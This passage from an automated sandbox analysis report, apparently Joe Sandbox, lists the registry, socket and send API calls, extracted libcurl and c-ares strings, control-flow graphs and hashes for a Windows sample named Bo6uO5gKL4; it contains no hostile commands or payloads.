                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0063AC46
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0063AD0A
                                      • RegEnumKeyExA.KERNELBASE ref: 0063AD8D
                                      • RegCloseKey.KERNELBASE(?), ref: 0063ADD9
                                      • RegEnumKeyExA.KERNELBASE ref: 0063AE08
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0063AE2A
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0063AE54
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0063AF63
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0063AFB2
                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0063B072
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: QueryValue$Open$CloseEnum
                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                      • API String ID: 4217438148-1047472027
                                      • Opcode ID: a0e082cb52085370af7bbe6d5efc5a142fb06dd3447e1aa11c6aac899ff9d833
                                      • Instruction ID: 4841ddba1f244f63829b0f6c2cf21be6567ec7aa97b1122046030fc0e942868a
                                      • Opcode Fuzzy Hash: a0e082cb52085370af7bbe6d5efc5a142fb06dd3447e1aa11c6aac899ff9d833
                                      • Instruction Fuzzy Hash: 3072AFB1A04341AFE7209B64CC82F6BB7E9AF85700F14582CF985D72A1E771E944DB93
                                      APIs
                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 005BA832
                                      Strings
                                      • Local port: %hu, xrefs: 005BAF28
                                      • @, xrefs: 005BAC42
                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 005BA6CE
                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 005BADAC
                                      • Trying [%s]:%d..., xrefs: 005BA689
                                      • bind failed with errno %d: %s, xrefs: 005BB080
                                      • Local Interface %s is ip %s using address family %i, xrefs: 005BAE60
                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 005BAD0A
                                      • cf_socket_open() -> %d, fd=%d, xrefs: 005BA796
                                      • cf-socket.c, xrefs: 005BA5CD, 005BA735
                                      • Bind to local port %d failed, trying next, xrefs: 005BAFE5
                                      • Trying %s:%d..., xrefs: 005BA7C2, 005BA7DE
                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 005BAE1F
                                      • Could not set TCP_NODELAY: %s, xrefs: 005BA871
                                      • @, xrefs: 005BA8F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 3981526788-2373386790
                                      • Opcode ID: a1317538c661f86b4c23c2b8ecf399460dce3afe347e3fec6925a29225a7e4b2
                                      • Instruction ID: c73bb67a858c38fb53e51eff230ce32cae9595431117cb1309eea4d65d9f148a
                                      • Opcode Fuzzy Hash: a1317538c661f86b4c23c2b8ecf399460dce3afe347e3fec6925a29225a7e4b2
                                      • Instruction Fuzzy Hash: 7D62D171508381ABE7218F24C846FEBBBE4FF95314F044929F98897292E771E945CB93

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 941 649740-64975b 942 649780-649782 941->942 943 64975d-649768 call 6478a0 941->943 945 649914-64994e call 908b70 RegOpenKeyExA 942->945 946 649788-6497a0 call 908e00 call 6478a0 942->946 951 64976e-649770 943->951 952 6499bb-6499c0 943->952 954 649950-649955 945->954 955 64995a-649992 RegQueryValueExA RegCloseKey call 908b98 945->955 946->952 956 6497a6-6497c5 946->956 951->956 957 649772-64977e 951->957 958 649a0c-649a15 952->958 954->958 969 649997-6499b5 call 6478a0 955->969 964 649827-649833 956->964 965 6497c7-6497e0 956->965 957->946 970 649835-64985c call 63e2b0 * 2 964->970 971 64985f-649872 call 645ca0 964->971 967 6497f6-649809 965->967 968 6497e2-6497f3 call 908b50 965->968 967->964 981 64980b-649810 967->981 968->967 969->952 969->956 970->971 982 6499f0 971->982 983 649878-64987d call 6477b0 971->983 981->964 986 649812-649822 981->986 985 6499f5-6499fb call 645d00 982->985 990 649882-649889 983->990 995 6499fe-649a09 985->995 986->958 990->985 994 64988f-64989b call 634fe0 990->994 994->982 999 6498a1-6498c3 call 908b50 call 6478a0 994->999 995->958 1005 6499c2-6499ed call 63e2b0 * 2 999->1005 1006 6498c9-6498db call 63e2d0 999->1006 1005->982 1006->1005 1010 6498e1-6498f0 call 63e2d0 1006->1010 1010->1005 1017 6498f6-649905 call 6463f0 1010->1017 1021 649f66-649f7f call 645d00 1017->1021 1022 64990b-64990f 1017->1022 1021->995 1023 649a3f-649a5a call 646740 call 6463f0 1022->1023 1023->1021 1030 649a60-649a6e call 646d60 1023->1030 1033 649a70-649a94 call 646200 call 6467e0 call 646320 1030->1033 1034 649a1f-649a39 call 646840 call 6463f0 1030->1034 1045 649a16-649a19 1033->1045 1046 649a96-649ac6 call 63d120 1033->1046 1034->1021 1034->1023 1045->1034 1048 649fc1 1045->1048 1051 649ae1-649af7 call 63d190 1046->1051 1052 649ac8-649adb call 63d120 1046->1052 1050 649fc5-649ffd call 645d00 call 63e2b0 * 2 1048->1050 1050->995 1051->1034 1060 649afd-649b09 call 634fe0 1051->1060 1052->1034 
1052->1051 1060->1048 1066 649b0f-649b29 call 63e730 1060->1066 1070 649f84-649f88 1066->1070 1071 649b2f-649b3a call 6478a0 1066->1071 1074 649f95-649f99 1070->1074 1071->1070 1078 649b40-649b54 call 63e760 1071->1078 1076 649fa0-649fb6 call 63ebf0 * 2 1074->1076 1077 649f9b-649f9e 1074->1077 1088 649fb7-649fbe 1076->1088 1077->1048 1077->1076 1084 649f8a-649f92 1078->1084 1085 649b5a-649b6e call 63e730 1078->1085 1084->1074 1091 649b70-64a004 1085->1091 1092 649b8c-649b97 call 6463f0 1085->1092 1088->1048 1097 64a015-64a01d 1091->1097 1098 649b9d-649bbf call 646740 call 6463f0 1092->1098 1099 649c9a-649cab call 63ea00 1092->1099 1100 64a024-64a045 call 63ebf0 * 2 1097->1100 1101 64a01f-64a022 1097->1101 1098->1099 1118 649bc5-649bda call 646d60 1098->1118 1110 649f31-649f35 1099->1110 1111 649cb1-649ccd call 63ea00 call 63e960 1099->1111 1100->1050 1101->1050 1101->1100 1113 649f37-649f3a 1110->1113 1114 649f40-649f61 call 63ebf0 * 2 1110->1114 1129 649cfd-649d0e call 63e960 1111->1129 1130 649ccf 1111->1130 1113->1034 1113->1114 1114->1034 1118->1099 1128 649be0-649bf4 call 646200 call 6467e0 1118->1128 1128->1099 1149 649bfa-649c0b call 646320 1128->1149 1139 649d10 1129->1139 1140 649d53-649d55 1129->1140 1131 649cd1-649cec call 63e9f0 call 63e4a0 1130->1131 1150 649d47-649d51 1131->1150 1151 649cee-649cfb call 63e9d0 1131->1151 1144 649d12-649d2d call 63e9f0 call 63e4a0 1139->1144 1143 649e69-649e8e call 63ea40 call 63e440 1140->1143 1169 649e94-649eaa call 63e3c0 1143->1169 1170 649e90-649e92 1143->1170 1166 649d2f-649d3c call 63e9d0 1144->1166 1167 649d5a-649d6f call 63e960 1144->1167 1161 649b75-649b86 call 63ea00 1149->1161 1162 649c11-649c1c call 647b70 1149->1162 1156 649dca-649ddb call 63e960 1150->1156 1151->1129 1151->1131 1179 649ddd-649ddf 1156->1179 1180 649e2e-649e36 1156->1180 1161->1092 1188 649f2d 1161->1188 1162->1092 1183 649c22-649c33 call 63e960 1162->1183 1166->1144 1191 649d3e-649d42 1166->1191 1194 649d71-649d73 1167->1194 1195 649dc2 
1167->1195 1198 649eb0-649eb1 1169->1198 1199 64a04a-64a04c 1169->1199 1176 649eb3-649ec4 call 63e9c0 1170->1176 1176->1034 1201 649eca-649ed0 1176->1201 1189 649e06-649e21 call 63e9f0 call 63e4a0 1179->1189 1185 649e3d-649e5b call 63ebf0 * 2 1180->1185 1186 649e38-649e3b 1180->1186 1210 649c35 1183->1210 1211 649c66-649c75 call 6478a0 1183->1211 1196 649e5e-649e67 1185->1196 1186->1185 1186->1196 1188->1110 1225 649de1-649dee call 63ec80 1189->1225 1226 649e23-649e2c call 63eac0 1189->1226 1191->1143 1206 649d9a-649db5 call 63e9f0 call 63e4a0 1194->1206 1195->1156 1196->1143 1196->1176 1198->1176 1204 64a057-64a070 call 63ebf0 * 2 1199->1204 1205 64a04e-64a051 1199->1205 1209 649ee5-649ef2 call 63e9f0 1201->1209 1204->1088 1205->1048 1205->1204 1239 649d75-649d82 call 63ec80 1206->1239 1240 649db7-649dc0 call 63eac0 1206->1240 1209->1034 1232 649ef8-649f0e call 63e440 1209->1232 1218 649c37-649c51 call 63e9f0 1210->1218 1228 64a011 1211->1228 1229 649c7b-649c8f call 63e7c0 1211->1229 1218->1092 1255 649c57-649c64 call 63e9d0 1218->1255 1243 649df1-649e04 call 63e960 1225->1243 1226->1243 1228->1097 1229->1092 1250 649c95-64a00e 1229->1250 1253 649f10-649f26 call 63e3c0 1232->1253 1254 649ed2-649edf call 63e9e0 1232->1254 1259 649d85-649d98 call 63e960 1239->1259 1240->1259 1243->1180 1243->1189 1250->1228 1253->1254 1267 649f28 1253->1267 1254->1034 1254->1209 1255->1211 1255->1218 1259->1195 1259->1206 1267->1048
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00649946
                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00649974
                                      • RegCloseKey.KERNELBASE(?), ref: 0064998B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                      • API String ID: 3677997916-615551945
                                      • Opcode ID: 9eade4337ec45536ab4f18d12aec219545bc79e822d5d7e322ff567eb98c8ece
                                      • Instruction ID: 254cb97b1507ea59e998cd68d5a213e638464872de166a44c90815cf1ea0161d
                                      • Opcode Fuzzy Hash: 9eade4337ec45536ab4f18d12aec219545bc79e822d5d7e322ff567eb98c8ece
                                      • Instruction Fuzzy Hash: 4032E7B5944201ABEB51AB20EC42B5B76E6AF45318F084438F909963A3F732ED15C7B7

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1269 5b8b50-5b8b69 1270 5b8b6b-5b8b74 1269->1270 1271 5b8be6 1269->1271 1273 5b8beb-5b8bf2 1270->1273 1274 5b8b76-5b8b8d 1270->1274 1272 5b8be9 1271->1272 1272->1273 1275 5b8b8f-5b8ba7 call 596e40 1274->1275 1276 5b8bf3-5b8bfe call 5ba550 1274->1276 1283 5b8cd9-5b8d16 SleepEx getsockopt 1275->1283 1284 5b8bad-5b8baf 1275->1284 1281 5b8de4-5b8def 1276->1281 1282 5b8c04-5b8c08 1276->1282 1287 5b8e8c-5b8e95 1281->1287 1288 5b8df5-5b8e19 call 5ba150 1281->1288 1289 5b8c0e-5b8c1d 1282->1289 1290 5b8dbd-5b8dc3 1282->1290 1285 5b8d18-5b8d20 1283->1285 1286 5b8d22 1283->1286 1291 5b8ca6-5b8cb0 1284->1291 1292 5b8bb5-5b8bb9 1284->1292 1293 5b8d26-5b8d39 1285->1293 1286->1293 1294 5b8f00-5b8f06 1287->1294 1295 5b8e97-5b8e9c 1287->1295 1329 5b8e1b-5b8e26 1288->1329 1330 5b8e88 1288->1330 1297 5b8c1f-5b8c34 connect 1289->1297 1298 5b8c35-5b8c48 call 5ba150 1289->1298 1290->1272 1291->1283 1299 5b8cb2-5b8cb8 1291->1299 1292->1273 1300 5b8bbb-5b8bc2 1292->1300 1302 5b8d3b-5b8d3d 1293->1302 1303 5b8d43-5b8d61 call 59d8c0 call 5ba150 1293->1303 1294->1273 1304 5b8edf-5b8eef call 5878b0 1295->1304 1305 5b8e9e-5b8eb6 call 592a00 1295->1305 1297->1298 1324 5b8c4d-5b8c4f 1298->1324 1307 5b8cbe-5b8cd4 call 5bb180 1299->1307 1308 5b8ddc-5b8dde 1299->1308 1300->1273 1309 5b8bc4-5b8bcc 1300->1309 1302->1303 1302->1308 1336 5b8d66-5b8d74 1303->1336 1326 5b8ef2-5b8efc 1304->1326 1305->1304 1328 5b8eb8-5b8edd call 593410 * 2 1305->1328 1307->1281 1308->1272 1308->1281 1310 5b8bce-5b8bd2 1309->1310 1311 5b8bd4-5b8bda 1309->1311 1310->1273 1310->1311 1311->1273 1317 5b8bdc-5b8be1 1311->1317 1325 5b8dac-5b8db8 call 5c50a0 1317->1325 1333 5b8c8e-5b8c93 1324->1333 1334 5b8c51-5b8c58 1324->1334 1325->1273 1326->1294 1328->1326 1331 5b8e28-5b8e2c 1329->1331 1332 5b8e2e-5b8e85 call 59d090 call 5c4fd0 1329->1332 1330->1287 1331->1330 1331->1332 1332->1330 1341 5b8c99-5b8c9f 1333->1341 1342 5b8dc8-5b8dd9 call 5bb100 1333->1342 1334->1333 1339 
5b8c5a-5b8c62 1334->1339 1336->1273 1343 5b8d7a-5b8d81 1336->1343 1346 5b8c6a-5b8c70 1339->1346 1347 5b8c64-5b8c68 1339->1347 1341->1291 1342->1308 1343->1273 1349 5b8d87-5b8d8f 1343->1349 1346->1333 1352 5b8c72-5b8c8b call 5c50a0 1346->1352 1347->1333 1347->1346 1354 5b8d9b-5b8da1 1349->1354 1355 5b8d91-5b8d95 1349->1355 1352->1333 1354->1273 1356 5b8da7 1354->1356 1355->1273 1355->1354 1356->1325
                                      APIs
                                      • connect.WS2_32(?,?,00000001), ref: 005B8C2F
                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 005B8CF3
                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 005B8D0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Sleepconnectgetsockopt
                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                      • API String ID: 1669343778-879669977
                                      • Opcode ID: ba0ae063335ad92814c4fdcaa64320f71fd95ef49b85ead302e7505d6cf1ad5a
                                      • Instruction ID: 4375283f7fc4ff598db24aef7e9e8e291e705b290f139e2f1d1487cf1f0b8f9f
                                      • Opcode Fuzzy Hash: ba0ae063335ad92814c4fdcaa64320f71fd95ef49b85ead302e7505d6cf1ad5a
                                      • Instruction Fuzzy Hash: AFB19C70604706AFDB10CF24C989BB6BFA8BF85314F049929E8695B2D2DB71FC54C762

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1455 582f17-582f8c call a51af0 call a51ee0 1460 5831c9-5831cd 1455->1460 1461 582f91-582ff4 call 581619 RegOpenKeyExA 1460->1461 1462 5831d3-5831d6 1460->1462 1465 582ffa-58300b 1461->1465 1466 5831c5 1461->1466 1467 58315c-5831ac RegEnumKeyExA 1465->1467 1466->1460 1468 583010-583083 call 581619 RegOpenKeyExA 1467->1468 1469 5831b2-5831c2 RegCloseKey 1467->1469 1472 583089-5830d4 RegQueryValueExA 1468->1472 1473 58314e-583152 1468->1473 1469->1466 1474 58313b-58314b RegCloseKey 1472->1474 1475 5830d6-583137 call a51dc0 call a51e50 call a51ee0 call a51cf0 call a51ee0 call a50250 1472->1475 1473->1467 1474->1473 1475->1474
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: d
                                      • API String ID: 1332880857-2564639436
                                      • Opcode ID: a2556e37a64245d8aca4efd537574d3aea24c47da386f959ec35cfab39f536fc
                                      • Instruction ID: 9428e81646d4efd29ff1f1b0c8e684d7e64d4da139ac08fe5a8756f873ed3c5d
                                      • Opcode Fuzzy Hash: a2556e37a64245d8aca4efd537574d3aea24c47da386f959ec35cfab39f536fc
                                      • Instruction Fuzzy Hash: 767196B49043199FDB10EF69C58579EBBF0BF84308F10899DE898A7351D7749A88CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1488 5876a0-5876be 1489 5876c0-5876c7 1488->1489 1490 5876e6-5876f2 send 1488->1490 1489->1490 1491 5876c9-5876d1 1489->1491 1492 58775e-587762 1490->1492 1493 5876f4-587709 call 5872a0 1490->1493 1494 58770b-587759 call 5872a0 call 58cb20 call 908c50 1491->1494 1495 5876d3-5876e4 1491->1495 1493->1492 1494->1492 1495->1493
                                      APIs
                                      • send.WS2_32(multi.c,?,?,?,N=X,00000000,?,?,005907BF), ref: 005876EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: LIMIT %s:%d %s reached memlimit$N=X$SEND %s:%d send(%lu) = %ld$multi.c$send
                                      • API String ID: 2809346765-4212605055
                                      • Opcode ID: 36cdb6e9ecb0e9dc2a04e110c4761f92c5f6f69b6830d493cd70071a7343e2a7
                                      • Instruction ID: 12ada1f55cc58add65617cdcf38ee4962b707e879e618f7cc72257724553aa2e
                                      • Opcode Fuzzy Hash: 36cdb6e9ecb0e9dc2a04e110c4761f92c5f6f69b6830d493cd70071a7343e2a7
                                      • Instruction Fuzzy Hash: CE11C8B5A093096BD110AB15EC4AE2B7F9CEBC6B68F540959FC0572252E665DC00C7B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1607 5b9290-5b92ed call 5876a0 1610 5b93c3-5b93ce 1607->1610 1611 5b92f3-5b92fb 1607->1611 1620 5b93d0-5b93e1 1610->1620 1621 5b93e5-5b9427 call 59d090 call 5c4f40 1610->1621 1612 5b93aa-5b93af 1611->1612 1613 5b9301-5b9333 call 59d8c0 call 59d9a0 1611->1613 1614 5b9456-5b9470 1612->1614 1615 5b93b5-5b93bc 1612->1615 1632 5b93a7 1613->1632 1633 5b9335-5b9364 WSAIoctl 1613->1633 1618 5b9429-5b9431 1615->1618 1619 5b93be 1615->1619 1623 5b9439-5b943f 1618->1623 1624 5b9433-5b9437 1618->1624 1619->1614 1620->1615 1625 5b93e3 1620->1625 1621->1614 1621->1618 1623->1614 1628 5b9441-5b9453 call 5c50a0 1623->1628 1624->1614 1624->1623 1625->1614 1628->1614 1632->1612 1636 5b939b-5b93a4 1633->1636 1637 5b9366-5b936f 1633->1637 1636->1632 1637->1636 1639 5b9371-5b9390 setsockopt 1637->1639 1639->1636 1640 5b9392-5b9395 1639->1640 1640->1636
                                      APIs
                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 005B935D
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 005B9388
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
